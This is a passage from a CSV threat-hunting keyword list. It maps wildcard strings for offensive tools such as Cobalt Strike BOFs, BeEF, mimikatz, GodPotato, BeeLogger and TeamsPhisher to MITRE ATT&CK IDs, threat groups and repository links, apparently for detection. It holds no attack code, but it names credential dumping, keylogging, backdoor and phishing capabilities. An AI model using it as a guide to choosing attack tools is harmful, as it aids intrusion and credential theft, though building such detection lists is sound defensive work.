- TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*BeaconNotify.cna*","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*BeaconObject.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconOutputStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*BeaconOutputWriter.cs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*BeaconPrintf(*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" +"*BeaconPrintf*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to identify processes with the CLR loaded with a goal of identifying SpawnTo / injection candidates.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconPrintToStreamW*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for 
Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" +"*BeaconSpawnTemporaryProcess*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*BeaconTool -*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 
- T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconTool/lib/sleep.jar*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*BeaconUseToken*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/BOF-RegSave","1","1","N/A","10","10","171","29","2020-10-08T17:29:02Z","2020-10-07T13:46:03Z" +"*beb285e40caf95bcc1552fc293194fa29275e3cdb9c62ef752b62257f6480aaf*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*beb7d48597345d0109ce51c7452292ba6e970eb8ed5f716ec035087aa3f045b3*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - 
T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*beef:beef*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind_tcp-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stage.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_bind-stager.asm*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef_test.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beefproject*","offensive_tool_keyword","beef","The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1210 - T1216 - T1207 - T1189 - T1190 - T1566","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*beef-xss*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*Beelogger*","offensive_tool_keyword","BeeLogger","Keylogger generator. 
fake office and acrobat file and malicious executables generator","T1056 - T1105 - T1204 - T1106","TA0003 - TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/4w4k3/BeeLogger","1","1","N/A","N/A","10","902","343","2022-12-02T19:42:41Z","2017-02-17T15:34:39Z" +"*BeetleChunks/SpoolSploit*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*before-create-implant-callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*before-create-implant-io-bin*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*before-find-implant-chunks*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*BeichenDream/GodPotato*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. 
It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*BeichenDream/SharpToken*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"*benjamin@gentilkiwi.com*","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*BeRoot*","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1548 - T1574","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beRoot.exe*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - 
T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beroot.py -*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*beRoot.zip*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*BeRoot-master*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" +"*berzerk0*","offensive_tool_keyword","Github Username","github username known for repos on passwords exploitation and offensive tools","N/A","N/A","N/A","N/A","Credential Access","https://github.com/berzerk0","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BesoToken.exe list*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - 
TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*BesoToken-master*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" +"*best*phish her*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*bestcrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bestcryptve2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BetterBackdoor*","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","3","275","89","2022-10-03T21:30:21Z","2019-07-29T14:45:24Z" +"*bettercap *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - 
